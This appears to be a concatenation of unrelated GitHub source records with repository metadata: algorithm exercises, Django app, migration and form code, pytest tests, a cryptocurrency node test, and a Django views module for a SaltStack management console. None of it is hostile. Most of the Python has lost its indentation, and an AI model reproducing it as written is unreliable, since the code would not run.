| 2021-04-18T20:42:37
| 2021-04-18T20:42:37
| 194,006,383
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,591
|
py
|
"""
We have a list of points on the plane. Find the K closest points to the origin (0, 0).
(Here, the distance between two points on a plane is the Euclidean distance.)
You may return the answer in any order. The answer is guaranteed to be unique (except for the order that it is in.)
Example 1:
Input: points = [[1,3],[-2,2]], K = 1
Output: [[-2,2]]
Explanation:
The distance between (1, 3) and the origin is sqrt(10).
The distance between (-2, 2) and the origin is sqrt(8).
Since sqrt(8) < sqrt(10), (-2, 2) is closer to the origin.
We only want the closest K = 1 points from the origin, so the answer is just [[-2,2]].
Example 2:
Input: points = [[3,3],[5,-1],[-2,4]], K = 2
Output: [[3,3],[-2,4]]
(The answer [[-2,4],[3,3]] would also be accepted.)
"""
"""
Quick Select
Time Complexity: O(n)
Space Complexity: O(1)
"""
class Solution:
def kClosest(self, points: List[List[int]], K: int) -> List[List[int]]:
vectors = [(p[0] ** 2 + p[1] ** 2, p[0], p[1]) for p in points]
self.quick_select_with_target(vectors, 0, len(vectors) - 1, K)
return [[x, y] for _, x, y in vectors[:K]]
def quick_select_with_target(self, vectors, start, end, target):
if start >= end:
return start
left, right = start, end
pivot = vectors[(start + end) // 2]
while left <= right:
while left <= right and vectors[left] < pivot:
left += 1
while left <= right and vectors[right] > pivot:
right -= 1
if left <= right:
vectors[left], vectors[right] = vectors[right], vectors[left]
left += 1
right -= 1
if target - 1 <= right:
return self.quick_select_with_target(vectors, start, right, target)
if target - 1 >= left:
return self.quick_select_with_target(vectors, left, end, target)
return target
"""
Priority Queue
Time Complexity: O(nlogk)
Space Complexity: O(k)
"""
import heapq
class Solution:
def kClosest(self, points: List[List[int]], K: int) -> List[List[int]]:
heap = []
for point in points:
distance = self.dist(point, [0, 0])
heapq.heappush(heap, [-distance, point[0], point[1]])
if len(heap) > K:
heapq.heappop(heap)
heap.sort(key=lambda x: (-x[0], x[1], x[2]))
return [[x, y] for _, x, y in heap]
def dist(self, a, b):
if a is None or b is None:
return float('-inf')
return (a[0] - b[0]) ** 2 + (a[1] - b[1]) ** 2
|
[
"hz336@cornell.edu"
] |
hz336@cornell.edu
|
d215d6cb373ff4b845e69b5dab58f40d7ac86236
|
6e4391a1e7ae04a22edeeb68f9a6179701b6ab02
|
/sir_assignmemts/program_4.py
|
ef115e647036de49338c2e67e83d90e1dbfcf085
|
[] |
no_license
|
iamrajshah/python_assignments
|
be129a20ce15628698b39a64488cb0e603004326
|
eec01828be205102bc551cf9d2eb4aff19c05852
|
refs/heads/master
| 2022-10-21T13:34:49.178036
| 2020-06-17T04:09:52
| 2020-06-17T04:09:52
| 264,990,935
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 241
|
py
|
def turnOnGivenBit(number, bit):
modifiedNumber = 1<<bit-1
print(number | modifiedNumber)
number = int(input('Enter the number:'))
bitPosition = int(input('Enter the bit-position to turned on:'))
turnOnGivenBit(number, bitPosition)
|
[
"shahrajesh2113@yahoo.com"
] |
shahrajesh2113@yahoo.com
|
0797af2c95637088a36e231295fda75cd70373a6
|
54447dfd073ceba38dbed5d8a04105f845d2fa4f
|
/apps/pages/apps.py
|
8543a84123edc71f662b40460d264556924e405c
|
[] |
no_license
|
Railkhayrullin/watch_store
|
58a4ea71db0c685efd87aa67f85f8f88d4cc6bc5
|
f469f37c69331d47461402bc8d120f4361260cce
|
refs/heads/master
| 2023-04-29T18:08:43.758849
| 2021-05-26T10:47:36
| 2021-05-26T10:47:36
| 358,810,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 89
|
py
|
from django.apps import AppConfig
class BlogConfig(AppConfig):
name = 'apps.pages'
|
[
"rail.khayrullin@gmail.com"
] |
rail.khayrullin@gmail.com
|
62acac9f1ebfd24d7c48ad282623209de9fb6711
|
2626f6e6803c8c4341d01f57228a0fe117e3680b
|
/students/MikeShand/Lesson 04/json_save/test/test_savables.py
|
3121cade9de7f296765a3f5f547a6ab833befd8f
|
[] |
no_license
|
kmsnyde/SP_Online_Course2_2018
|
9e59362da253cdec558e1c2f39221c174d6216f3
|
7fe8635b47d4792a8575e589797260ad0a2b027e
|
refs/heads/master
| 2020-03-19T17:15:03.945523
| 2018-09-05T22:28:55
| 2018-09-05T22:28:55
| 136,750,231
| 0
| 0
| null | 2018-06-09T19:01:52
| 2018-06-09T19:01:51
| null |
UTF-8
|
Python
| false
| false
| 2,565
|
py
|
#!/usr/bin/env python
"""
tests for the savable objects
"""
import pytest
import json
from json_save.saveables import *
# The simple, almost json <-> python ones:
# Type, default, example
basics = [(String, "This is a string"),
(Int, 23),
(Float, 3.1458),
(Bool, True),
(Bool, False),
(List, [2, 3, 4]),
(Tuple, (1, 2, 3.4, "this")),
(List, [[1, 2, 3], [4, 5, 6]]),
(List, [{"3": 34}, {"4": 5}]), # list with dicts in it.
(Dict, {"this": {"3": 34}, "that": {"4": 5}}) # dict with dicts
]
@pytest.mark.parametrize(('Type', 'val'), basics)
def test_basics(Type, val):
js = json.dumps(Type.to_json_compat(val))
val2 = Type.to_python(json.loads(js))
assert val == val2
assert type(val) == type(val2)
nested = [(List, [(1, 2), (3, 4), (5, 6)]), # tuple in list
(Tuple, ((1, 2), (3, 4), (5, 6))), # tuple in tuple
]
# This maybe should be fixed in the future??
@pytest.mark.xfail(reason="nested not-standard types not supported")
@pytest.mark.parametrize(('Type', 'val'), nested)
def test_nested(Type, val):
print("original value:", val)
js = json.dumps(Type.to_json_compat(val))
print("js is:", js)
val2 = Type.to_python(json.loads(js))
print("new value is:", val2)
assert val == val2
assert type(val) == type(val2)
dicts = [{"this": 14, "that": 1.23},
{34: 15, 23: 5},
{3.4: "float_key", 1.2: "float_key"},
{(1, 2, 3): "tuple_key"},
{(3, 4, 5): "tuple_int", ("this", "that"): "tuple_str"},
{4: "int_key", 1.23: "float_key", (1, 2, 3): "tuple_key"},
]
@pytest.mark.parametrize('val', dicts)
def test_dicts(val):
js = json.dumps(Dict.to_json_compat(val))
val2 = Dict.to_python(json.loads(js))
assert val == val2
assert type(val) == type(val2)
# check that the types of the keys is the same
for k1, k2 in zip(val.keys(), val2.keys()):
assert type(k1) is type(k2)
# These are dicts that can't be saved
# -- mixing string and non-string keys
bad_dicts = [{"this": "string_key", 4: "int_key"},
{3: "int_key", "this": "string_key"},
{None: "none_key", "this": "string_key"},
{"this": "string_key", None: "none_key"},
]
@pytest.mark.parametrize("val", bad_dicts)
def test_bad_dicts(val):
with pytest.raises(TypeError):
Dict.to_json_compat(val)
|
[
"kmsnyder2@verizon.net"
] |
kmsnyder2@verizon.net
|
8bf0b1f72b2e606188c775d35b3aa59e41a431d3
|
a6a349e3aed8462909fdf4397ec4ffa598d2904c
|
/django/contrib/gis/forms/fields.py
|
072dd4766b6d875b08d9225141aac8813db2e18a
|
[
"BSD-3-Clause"
] |
permissive
|
mrts2/django
|
02b66cde7392275db22a35d03c6228f16c602d94
|
973cf20260cb90b42b0c97d6fe80c988b539ed89
|
refs/heads/master
| 2021-01-21T01:35:13.330520
| 2009-04-26T06:08:26
| 2009-04-26T06:08:26
| 185,943
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,745
|
py
|
from django import forms
from django.utils.translation import ugettext_lazy as _
# While this couples the geographic forms to the GEOS library,
# it decouples from database (by not importing SpatialBackend).
from django.contrib.gis.geos import GEOSGeometry
class GeometryField(forms.Field):
"""
This is the basic form field for a Geometry. Any textual input that is
accepted by GEOSGeometry is accepted by this form. By default,
this includes WKT, HEXEWKB, WKB (in a buffer), and GeoJSON.
"""
widget = forms.Textarea
default_error_messages = {
'no_geom' : _(u'No geometry value provided.'),
'invalid_geom' : _(u'Invalid geometry value.'),
'invalid_geom_type' : _(u'Invalid geometry type.'),
'transform_error' : _(u'An error occurred when transforming the geometry'
'to the SRID of the geometry form field.'),
}
def __init__(self, **kwargs):
# Pop out attributes from the database field, or use sensible
# defaults (e.g., allow None).
self.srid = kwargs.pop('srid', None)
self.geom_type = kwargs.pop('geom_type', 'GEOMETRY')
self.null = kwargs.pop('null', True)
super(GeometryField, self).__init__(**kwargs)
def clean(self, value):
"""
Validates that the input value can be converted to a Geometry
object (which is returned). A ValidationError is raised if
the value cannot be instantiated as a Geometry.
"""
if not value:
if self.null and not self.required:
# The geometry column allows NULL and is not required.
return None
else:
raise forms.ValidationError(self.error_messages['no_geom'])
# Trying to create a Geometry object from the form value.
try:
geom = GEOSGeometry(value)
except:
raise forms.ValidationError(self.error_messages['invalid_geom'])
# Ensuring that the geometry is of the correct type (indicated
# using the OGC string label).
if str(geom.geom_type).upper() != self.geom_type and not self.geom_type == 'GEOMETRY':
raise forms.ValidationError(self.error_messages['invalid_geom_type'])
# Transforming the geometry if the SRID was set.
if self.srid:
if not geom.srid:
# Should match that of the field if not given.
geom.srid = self.srid
elif self.srid != -1 and self.srid != geom.srid:
try:
geom.transform(self.srid)
except:
raise forms.ValidationError(self.error_messages['transform_error'])
return geom
|
[
"jbronn@bcc190cf-cafb-0310-a4f2-bffc1f526a37"
] |
jbronn@bcc190cf-cafb-0310-a4f2-bffc1f526a37
|
09944c01ca308136cfa4faea92a9b6151e86e8ec
|
609966de60a1743971de663017f10f016fed2e9c
|
/server/upload/migrations/0014_auto_20181120_2025.py
|
e366111e8bf32f81b6c836e73f0fe9bcb6e8ab22
|
[] |
no_license
|
arpit-1110/Secure-Personal-Cloud
|
8ea3bff732e2928310b1799a49ad6947fa8d1dc8
|
3c5685db29948f6046e873bfe23a589dd5dc6c58
|
refs/heads/master
| 2021-06-22T17:36:12.988532
| 2020-07-02T12:06:41
| 2020-07-02T12:06:41
| 151,406,735
| 2
| 1
| null | 2021-06-10T23:07:20
| 2018-10-03T12:10:14
|
HTML
|
UTF-8
|
Python
| false
| false
| 401
|
py
|
# Generated by Django 2.1.2 on 2018-11-20 20:25
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('upload', '0013_auto_20181120_1948'),
]
operations = [
migrations.RemoveField(
model_name='document',
name='author',
),
migrations.DeleteModel(
name='Document',
),
]
|
[
"noreply@github.com"
] |
noreply@github.com
|
2d670cf46ab518d12618a5c7cd214f15721b1946
|
1afec7d1d3099138b5afe5fd73dfd3d24ff4eb15
|
/test/functional/feature_minchainwork.py
|
bf9177d0a7c94fd1dfa263477971b818dbe15ed0
|
[
"MIT"
] |
permissive
|
republic-productions/finalcoin
|
5c7c6b0734178fe22db63f0946ec555f59e8d0eb
|
7c0f335ded1e5c662034c822ca2c474b8e62778f
|
refs/heads/main
| 2023-09-04T17:04:32.683667
| 2021-10-14T17:45:22
| 2021-10-14T17:45:22
| 417,209,088
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,109
|
py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Finalcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test logic for setting nMinimumChainWork on command line.
Nodes don't consider themselves out of "initial block download" until
their active chain has more work than nMinimumChainWork.
Nodes don't download blocks from a peer unless the peer's best known block
has more work than nMinimumChainWork.
While in initial block download, nodes won't relay blocks to their peers, so
test that this parameter functions as intended by verifying that block relay
only succeeds past a given node once its nMinimumChainWork has been exceeded.
"""
import time
from test_framework.test_framework import FinalcoinTestFramework
from test_framework.util import assert_equal
# 2 hashes required per regtest block (with no difficulty adjustment)
REGTEST_WORK_PER_BLOCK = 2
class MinimumChainWorkTest(FinalcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [[], ["-minimumchainwork=0x65"], ["-minimumchainwork=0x65"]]
self.node_min_work = [0, 101, 101]
def setup_network(self):
# This test relies on the chain setup being:
# node0 <- node1 <- node2
# Before leaving IBD, nodes prefer to download blocks from outbound
# peers, so ensure that we're mining on an outbound peer and testing
# block relay to inbound peers.
self.setup_nodes()
for i in range(self.num_nodes-1):
self.connect_nodes(i+1, i)
def run_test(self):
# Start building a chain on node0. node2 shouldn't be able to sync until node1's
# minchainwork is exceeded
starting_chain_work = REGTEST_WORK_PER_BLOCK # Genesis block's work
self.log.info(f"Testing relay across node 1 (minChainWork = {self.node_min_work[1]})")
starting_blockcount = self.nodes[2].getblockcount()
num_blocks_to_generate = int((self.node_min_work[1] - starting_chain_work) / REGTEST_WORK_PER_BLOCK)
self.log.info(f"Generating {num_blocks_to_generate} blocks on node0")
hashes = self.generatetoaddress(self.nodes[0], num_blocks_to_generate,
self.nodes[0].get_deterministic_priv_key().address)
self.log.info(f"Node0 current chain work: {self.nodes[0].getblockheader(hashes[-1])['chainwork']}")
# Sleep a few seconds and verify that node2 didn't get any new blocks
# or headers. We sleep, rather than sync_blocks(node0, node1) because
# it's reasonable either way for node1 to get the blocks, or not get
# them (since they're below node1's minchainwork).
time.sleep(3)
self.log.info("Verifying node 2 has no more blocks than before")
self.log.info(f"Blockcounts: {[n.getblockcount() for n in self.nodes]}")
# Node2 shouldn't have any new headers yet, because node1 should not
# have relayed anything.
assert_equal(len(self.nodes[2].getchaintips()), 1)
assert_equal(self.nodes[2].getchaintips()[0]['height'], 0)
assert self.nodes[1].getbestblockhash() != self.nodes[0].getbestblockhash()
assert_equal(self.nodes[2].getblockcount(), starting_blockcount)
self.log.info("Generating one more block")
self.generatetoaddress(self.nodes[0], 1, self.nodes[0].get_deterministic_priv_key().address)
self.log.info("Verifying nodes are all synced")
# Because nodes in regtest are all manual connections (eg using
# addnode), node1 should not have disconnected node0. If not for that,
# we'd expect node1 to have disconnected node0 for serving an
# insufficient work chain, in which case we'd need to reconnect them to
# continue the test.
self.sync_all()
self.log.info(f"Blockcounts: {[n.getblockcount() for n in self.nodes]}")
if __name__ == '__main__':
MinimumChainWorkTest().main()
|
[
"republicproductions@protonmail.com"
] |
republicproductions@protonmail.com
|
900b424ebfa594d40ca4dcc8a7346b168b4070c8
|
f55e0d871e8652c21bd30acf7f18468f4a9ce00d
|
/SALT/views.py
|
7ff3baedcb875c25a5ca56389989aed8e6f9c426
|
[] |
no_license
|
chensambb/EWP_OMS
|
a5a01d1964e2ce726c8c0cf03a514d566131a76e
|
25a3fa7f3922a62b60e57a3b899d2600925de445
|
refs/heads/master
| 2021-01-19T03:37:54.855404
| 2016-06-21T05:39:04
| 2016-06-21T05:39:04
| 61,770,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,063
|
py
|
# -*- coding: utf-8 -*-
from django.shortcuts import render,render_to_response,get_object_or_404
from django.http import HttpResponseRedirect,HttpResponse,JsonResponse
from django.core.urlresolvers import reverse
from django.contrib import auth
from django.contrib.auth.decorators import login_required #setting: LOGIN_URL = '/auth/login/'
from django.shortcuts import redirect
from django.contrib.auth import update_session_auth_hash
from django.contrib.auth.forms import PasswordChangeForm
from models import *
from CMDB.models import *
from SaltAPI import SaltAPI
import json
from django.forms.models import model_to_dict
import re
#่ทๅๅฝไปค
@login_required
def command(request):
module_id = request.GET.get('module_id')
module_name = request.GET.get('module_name')
client = request.GET.get('client')
cmd = request.GET.get('cmd')
active = request.GET.get('active')
context={}
#ๅฝไปคๆถ้
if active=='collect':
try:
salt_server=SaltServer.objects.all()[0]
sapi = SaltAPI(url=salt_server.url,username=salt_server.username,password=salt_server.password)
funs=['doc.runner','doc.wheel','doc.execution']
for fun in funs:
result = sapi.SaltRun(fun=fun,client='runner')
cs=result['return'][0]
for c in cs:
Module.objects.get_or_create(client=fun.split('.')[1],name=c.split('.')[0])
module=Module.objects.get(client=fun.split('.')[1],name=c.split('.')[0])
Command.objects.get_or_create(cmd=c,module=module)
command=Command.objects.get(cmd=c,module=module)
if not command.doc:
command.doc=cs[c]
command.save()
context['success']=u'ๅฝไปคๆถ้ๅฎๆ๏ผ'
except Exception as error:
context['error']=error
cmd_list=Command.objects.order_by('cmd')
module_list=Module.objects.order_by('client','name')
#ๆๆจกๅ่ฟๆปค
if request.method=='GET' and module_id:
cmd_list = cmd_list.filter(module=module_id)
if request.is_ajax() and client:
if re.search('runner',client):
client='runner'
elif re.search('wheel',client):
client='wheel'
else:
client='execution'
#ๅฝไปคๅธฎๅฉไฟกๆฏ
if cmd:
try:
command=Command.objects.get(cmd=cmd,module__client=client)
doc=command.doc.replace("\n","<br>").replace(" "," ")
except Exception as error:
doc=str(error)
return JsonResponse(doc,safe=False)
#่ฏทๆฑๆจกๅไธ็ๅฝไปค
elif module_name:
cmd_list = cmd_list.filter(module__client=client,module__name=module_name).order_by('-cmd')
cmd_list = [cmd.cmd for cmd in cmd_list]
return JsonResponse(cmd_list,safe=False)
#่ฏทๆฑCLIENTไธ็ๆจกๅ
else:
module_list=module_list.filter(client=client)
module_list=[module.name for module in module_list.order_by('-name')]
return JsonResponse(module_list,safe=False)
context['cmd_list']=cmd_list
context['module_list']=module_list
return render(request, 'SALT/command.html', context)
#ๆฅๅฃๅ่กจ
@login_required
def server(request):
server_list=SaltServer.objects.order_by('idc')
return render(request, 'SALT/server.html', locals())
#็ฎๆ ่ฟๆปค
@login_required
def target(request):
if request.is_ajax():
if request.method == 'GET':
tgt=request.GET.get('tgt','')
idc_id=request.GET.get('idc_id','')
system_id = request.GET.get('system_id','')
group_id = request.GET.get('group_id','')
# print(idc_id,system_id,group_id,hostname)
host_list = HostDetail.objects.filter(salt_status=True).order_by('tgt_id')
if tgt:
if idc_id:
if system_id:
if group_id:
host_list = host_list.filter(tgt_id__icontains=tgt,host__server__idc=idc_id,host__system_type=system_id,host__group=group_id)
else:
host_list = host_list.filter(tgt_id__icontains=tgt,host__server__idc=idc_id,host__system_type=system_id)
elif group_id:
host_list = host_list.filter(tgt_id__icontains=tgt,host__server__idc=idc_id,host__group=group_id)
else:
host_list = host_list.filter(tgt_id__icontains=tgt,host__server__idc=idc_id)
elif system_id:
if group_id:
host_list = host_list.filter(tgt_id__icontains=tgt,host__system_type=system_id,host__group=group_id)
else:
host_list = host_list.filter(tgt_id__icontains=tgt,host__system_type=system_id)
elif group_id:
host_list = host_list.filter(tgt_id__icontains=tgt,host__group=group_id)
else:
host_list = host_list.filter(tgt_id__icontains=tgt)
elif idc_id:
if system_id:
if group_id:
host_list = host_list.filter(host__server__idc=idc_id,host__system_type=system_id,host__group=group_id)
else:
host_list = host_list.filter(host__server__idc=idc_id,host__system_type=system_id)
elif group_id:
host_list = host_list.filter(host__server__idc=idc_id,host__group=group_id)
else:
host_list = host_list.filter(host__server__idc=idc_id)
elif system_id:
if group_id:
host_list = host_list.filter(host__system_type=system_id,host__group=group_id)
else:
host_list = host_list.filter(host__system_type=system_id)
elif group_id:
host_list = host_list.filter(host__group=group_id)
# print host_list
host_list = [host.tgt_id for host in host_list]
return JsonResponse(host_list,safe=False)
#ๅฝไปค็ปๆ
@login_required
def result(request):
if request.is_ajax():
if request.method == 'GET':
id = request.GET.get('id')
idc = request.GET.get('idc')
client = request.GET.get('client')
tgt_type = request.GET.get('tgt_type')
tgt = request.GET.get('tgt','')
fun = request.GET.get('fun')
arg = request.GET.get('arg','')
user = request.user.username
if id:
r=Result.objects.get(id=id)
result = json.loads(r.result) #result.html้ป่ฎคไปๆฐๆฎๅบไธญ่ฏปๅ
return JsonResponse(result,safe=False)
try:
salt_server = SaltServer.objects.get(idc=idc,role='Master') #ๆ นๆฎๆบๆฟID้ๆฉๅฏนๅบsaltๆๅก็ซฏ
sapi = SaltAPI(url=salt_server.url,username=salt_server.username,password=salt_server.password)
if re.search('runner',client) or re.search('wheel',client):
result=sapi.SaltRun(client=client,fun=fun,arg=arg)
else:
result = sapi.SaltCmd(client=client,tgt=tgt,fun=fun,arg=arg,expr_form=tgt_type)
if re.search('async',client):
jid = result['return'][0]['jid']
# minions = ','.join(result['return'][0]['minions'])
r=Result(client=client,jid=jid,minions=tgt,fun=fun,arg=arg,tgt_type=tgt_type,idc_id=idc,user=user)
res=r.jid #ๅผๆญฅๅฝไปคๅช่ฟๅJID๏ผไนๅJSไผ่ฐ็จjid_info
else:
res=result['return'][0]#ๅๆญฅๅฝไปค็ดๆฅ่ฟๅ็ปๆ
r=Result(client=client,minions=tgt,fun=fun,arg=arg,tgt_type=tgt_type,idc_id=idc,user=user,result=json.dumps(res))
r.save()
# res=model_to_dict(r,exclude='result')
return JsonResponse(res,safe=False)
except Exception as error:
return JsonResponse({'Error':"%s"%error},safe=False)
else:
idc_list= IDC.objects.all()
result_list = Result.objects.order_by('-id')
return render(request, 'SALT/result.html', locals())
#ไปปๅกไฟกๆฏ
@login_required
def jid_info(request):
jid = request.GET.get('jid','')
if jid:
try:
r = Result.objects.get(jid=jid)
if r.result and r.result!='{}' :
result = json.loads(r.result) #cmd_result.html้ป่ฎคไปๆฐๆฎๅบไธญ่ฏปๅ
else:
idc = r.idc_id
salt_server = SaltServer.objects.get(idc=idc,role='Master')
sapi = SaltAPI(url=salt_server.url,username=salt_server.username,password=salt_server.password)
jid_info=sapi.SaltJob(jid)
result = jid_info['info'][0]['Result']
r.result=json.dumps(result)
r.save()
return JsonResponse(result,safe=False)
except Exception as error:
return JsonResponse({'error':error},safe=False)
#่ฎค่ฏKEY็ฎก็
@login_required
def keys(request):
idc_list = IDC.objects.order_by('name')
idc=request.GET.get('idc',idc_list[0].id)
key=request.GET.get('key','')
active=request.GET.get('active','')
context={'idc_list':idc_list,'idc':long(idc)}
try:
salt_server = SaltServer.objects.get(idc=idc,role='Master')
sapi = SaltAPI(url=salt_server.url,username=salt_server.username,password=salt_server.password)
if key:
if active == 'del':
success=sapi.DeleteKey(key)
if success:
context['success']=u'KEY"%s"ๅ ้คๆๅ๏ผ'%key
else:
context['success']=u'KEY"%s"ๅ ้คๅคฑ่ดฅ๏ผ'%key
if active == 'accept':
success=sapi.AcceptKey(key)
if success:
context['success']=u'KEY"%s"ๆฅๅๆๅ๏ผ'%key
else:
context['success']=u'KEY"%s"ๆฅๅๅคฑ่ดฅ๏ผ'%key
minions,minions_pre=sapi.ListKey()
context['minions']=minions
context['minions_pre']=minions_pre
except Exception as error:
context['error']=error
print context
return render(request,'SALT/keys.html',context)
@login_required
def minions(request):
idc_list = IDC.objects.order_by('name')
idc=request.GET.get('idc',idc_list[0].id)
key=request.GET.get('key','')
active=request.GET.get('active','')
context={'idc_list':idc_list,'idc':long(idc)}
try:
salt_server = SaltServer.objects.get(ip__server__idc=idc,role='M')
sapi = SaltAPI(url=salt_server.url,username=salt_server.username,password=salt_server.password)
minions=sapi.SaltRun(fun='manage.status')
print minions
context['minions_up']=minions['return'][0]['up']
context['minions_down']=minions['return'][0]['down']
except Exception as error:
context['minions_up']=[]
context['minions_down']=[]
context['error']=error
print context
return render(request,'SALT/minions.html',context)
#ๅฝไปคๆง่ก้กต้ข
@login_required
def execute(request):
idc_list = IDC.objects.order_by('name')
module_list=Module.objects.filter(client='execution').order_by('name')
idc=request.GET.get('idc',idc_list[0].id)
context={'idc_list':idc_list,'module_list':module_list,'idc':long(idc)}
try:
salt_server = SaltServer.objects.get(idc=idc,role='Master')
context['salt_server']=salt_server
sapi = SaltAPI(url=salt_server.url,username=salt_server.username,password=salt_server.password)
result=sapi.SaltRun(client='runner',fun='manage.status')
context['minions_up']=result['return'][0]['up']
context['minions_down']=result['return'][0]['down']
except Exception as error:
context['error']=error
return render(request,'SALT/execute.html',context)
@login_required
def deploy(request):
idc_list = IDC.objects.order_by('name')
idc=request.GET.get('idc',idc_list[0].id)
context={'idc_list':idc_list,'idc':long(idc)}
return render(request,'SALT/deploy.html',context)
@login_required
def config(request,server_id):
server_list=SaltServer.objects.all()
salt_server = SaltServer.objects.get(id=server_id)
context={'server_list':server_list,'salt_server':salt_server}
sapi = SaltAPI(url=salt_server.url,username=salt_server.username,password=salt_server.password)
result=sapi.SaltRun(client='wheel',fun='config.values')
configs=result['return'][0]['data']['return']
context['envs']=sorted(configs['file_roots'].keys())
if request.is_ajax() :
env=request.GET.get('env')
file=request.GET.get('file')
content=request.GET.get('content')
if env:
if file:
if content:#ๅๅ
ฅๆไปถๅ
ๅฎน๏ผๆไปถไผไบง็[noeol]้ฎ้ข๏ผๆๆถไธ็จๆญคๅ่ฝ
# arg='path==%s,,data==%s,,saltenv==%s'%(file,content,env)
try:
r=sapi.SaltRun(client='wheel',fun='file_roots.write',path=file,data=content,saltenv=env)
success=r['return'][0]['data']['success']
if success:
res=u"ๆไปถ%sไฟๅญๆๅ๏ผ"%file
else:
res=u"ๆไปถ%sไฟๅญๅคฑ่ดฅ๏ผ"%file
except Exception as error:
res=str(error)
else:#่ฏปๅ็ฏๅขไธๆไปถๅ
ๅฎน
try:
path=configs['file_roots'][env][0]+file
# arg='path==%s,,saltenv==%s'%(path,env)
r=sapi.SaltRun(client='wheel',fun='file_roots.read',path=path,saltenv=env)
res=r['return'][0]['data']['return']
if isinstance(res,str):
res={'Error':res}
else:
res=res[0]
print type(res),res
except Exception as error:
res={'Error':str(error)}
print error
else:#ๅๅบ็ฏๅขไธ็ๆไปถ
try:
res=sapi.SaltRun(client='runner',fun='fileserver.file_list',saltenv=env)['return'][0]
# res=[]
# for f in fs:
# if not re.search('.svn',f) and not re.search('pki/',f):
# res.append(f)
except Exception as error:
res=[str(error)]
else:
res=None
return JsonResponse(res,safe=False)
else:
return render(request,'SALT/config.html',context)
|
[
"ywzhou@ewininfo.com"
] |
ywzhou@ewininfo.com
|
e83f47dbd72ca335c9ebd0b2ca917651d3aab358
|
48a65d8b989ef2ba014a32d45ccc188234913529
|
/catkin_ws_lab/build/odom_to_trajectory/catkin_generated/pkg.installspace.context.pc.py
|
5cacdb1f6e1669d645f76ebb7f2fc28fe65e553b
|
[] |
no_license
|
cielsys/RoboND2_Proj2_WhereAmI
|
3f28ccb0e4632e75a7d49f4137e0677c11a93809
|
88d425799ebe4dd0c380bbfa08d7b8e173fee764
|
refs/heads/master
| 2020-04-17T05:54:56.517721
| 2019-01-26T21:54:32
| 2019-01-26T21:54:32
| 166,303,520
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 436
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "odom_to_trajectory"
PROJECT_SPACE_DIR = "/home/cl/AAAProjects/AAAUdacity/roboND2/Proj2_Localization/P2_Root/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
|
[
"ciel.github@cielsystems.com"
] |
ciel.github@cielsystems.com
|
6a92c988f60facc3f241c0d2989405a32321adcc
|
7419aba26b3163726a37fb1ab64040b51560d3a5
|
/6.py
|
7cb0f736b54db896db2dcf904ab5c69af013cf40
|
[] |
no_license
|
hopemit/project
|
1c82755a405cabbfb45ce5e8e350fb598e84db7a
|
53b4d8b98986058c156da434528022eb9a7c0479
|
refs/heads/master
| 2022-12-08T01:28:31.902345
| 2020-08-20T15:34:30
| 2020-08-20T15:34:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 205
|
py
|
phrase = 'Parcham balast! '
ph_list = list(phrase)
new_ph = ''.join(ph_list[8:10])
new_ph = new_ph + ''.join (ph_list [-12:-15:-2])
new_ph = new_ph + ''.join (ph_list [5:8])
print (new_ph)
|
[
"noreply@github.com"
] |
noreply@github.com
|
167189898c959abc7ed28e564880ee1069d227f1
|
2d4380518d9c591b6b6c09ea51e28a34381fc80c
|
/CIM16/CDPSM/Balanced/IEC61970/LoadModel/__init__.py
|
9ee7be64a7b50687c12f23c691687acf992d4b74
|
[
"MIT"
] |
permissive
|
fran-jo/PyCIM
|
355e36ae14d1b64b01e752c5acd5395bf88cd949
|
de942633d966bdf2bd76d680ecb20517fc873281
|
refs/heads/master
| 2021-01-20T03:00:41.186556
| 2017-09-19T14:15:33
| 2017-09-19T14:15:33
| 89,480,767
| 0
| 1
| null | 2017-04-26T12:57:44
| 2017-04-26T12:57:44
| null |
UTF-8
|
Python
| false
| false
| 1,650
|
py
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""This package is responsible for modeling the energy consumers and the system load as curves and associated curve data. Special circumstances that may affect the load, such as seasons and daytypes, are also included here. This information is used by Load Forecasting and Load Management.
"""
from CIM16.CDPSM.Balanced.IEC61970.LoadModel.LoadResponseCharacteristic import LoadResponseCharacteristic
nsURI = "http://iec.ch/TC57/2010/CIM-schema-cim15?profile=http://iec.ch/TC57/2011/iec61968-13/CDPSM/Balanced#LoadModel"
nsPrefix = "cimLoadModel"
|
[
"fran_jo@hotmail.com"
] |
fran_jo@hotmail.com
|
